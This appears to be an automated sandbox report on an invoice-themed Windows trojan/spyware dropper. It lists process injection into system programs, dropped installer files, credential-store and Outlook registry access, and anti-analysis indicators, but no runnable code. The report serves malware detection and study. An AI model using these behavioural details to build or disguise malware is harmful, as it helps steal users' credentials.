Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196435867.0000000000453000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.000000000657F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/10@3/2

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049B1

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004021CF

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

File created: C:\Users\user\AppData\Local\Temp\nseB9BC.tmp

Jump to behavior

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe	ReversingLabs: Detection: 21%
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe	Virustotal: Detection: 25%

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

File read: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
Source: C:\Windows\SysWOW64\rasphone.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: oleacc.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: shfolder.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: cryptbase.dll			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: militriskes.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\Transformationsmodeller.Tri12

Source: C:\Windows\SysWOW64\rasphone.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Source: Yara match	File source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, type: DROPPED

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_707E1BFF

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_707E30C0 push eax; ret		0_2_707E30EE
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367097A1 push es; iretd		2_2_367097A8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367021AD pushad ; retf 0004h		2_2_3670223F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367308CD push ecx; mov dword ptr [esp], ecx		2_2_367308D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643CF57 push ebx; rep ret		2_2_3643CF61
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36435496 pushad ; ret		2_2_364354A0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36445252 push eax; ret		2_2_36445254
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36436B87 push ebx; iretd		2_2_36436B9F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36441BA1 pushad ; ret		2_2_36441BA4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643C86F push eax; ret		2_2_3643C870
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643D01B push ebx; rep ret		2_2_3643CF61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E886F push eax; ret		3_2_006E8870
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E901B push ebx; rep ret		3_2_006E8F61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E1496 pushad ; ret		3_2_006E14A0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006F1252 push eax; ret		3_2_006F1254
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E1E18 pushad ; retf		3_2_006E1E19
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E1758 pushfd ; retf		3_2_006E1890
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E8F57 push ebx; rep ret		3_2_006E8F61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006EDBA1 pushad ; ret		3_2_006EDBA4
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E2B87 push ebx; iretd		3_2_006E2B9F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04918801 pushad ; retf		3_2_04918802
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04927C3B push eax; ret		3_2_04927C3D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0492458A pushad ; ret		3_2_0492458D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0491F940 push ebx; rep ret		3_2_0491F94A
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04919570 push ebx; iretd		3_2_04919588
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0491FA04 push ebx; rep ret		3_2_0491F94A
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0491F258 push eax; ret		3_2_0491F259
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04917E7F pushad ; ret		3_2_04917E89
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048408CD push ecx; mov dword ptr [esp], ecx		4_2_048408D6
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C15496 pushad ; ret		4_2_04C154A0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1D01B push ebx; rep ret		4_2_04C1CF61

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	File created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	File created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 8ECAE36
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 567AE36
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 7FF8F0B90594
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 7FF8F0B8FF74
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 7FF8F0B8D6C4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 7FF8F0B8D864
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API/Special instruction interceptor: Address: 7FF8F0B8D004
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D144
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B90594
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D764
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D324
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D364
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D004
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8FF74
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D6C4
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D864
Source: C:\Windows\SysWOW64\rasphone.exe	API/Special instruction interceptor: Address: 7FF8F0B8D604

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 2_2_36771763 rdtsc

2_2_36771763

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API coverage: 0.4 %
Source: C:\Windows\SysWOW64\rasphone.exe	API coverage: 1.2 %

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076	Thread sleep count: 69 > 30			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076	Thread sleep time: -345000s >= -30000s			Jump to behavior

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Last function: Thread delayed
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405C4D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_00402930 FindFirstFileW,		0_2_00402930
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,		0_2_0040689E

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWs
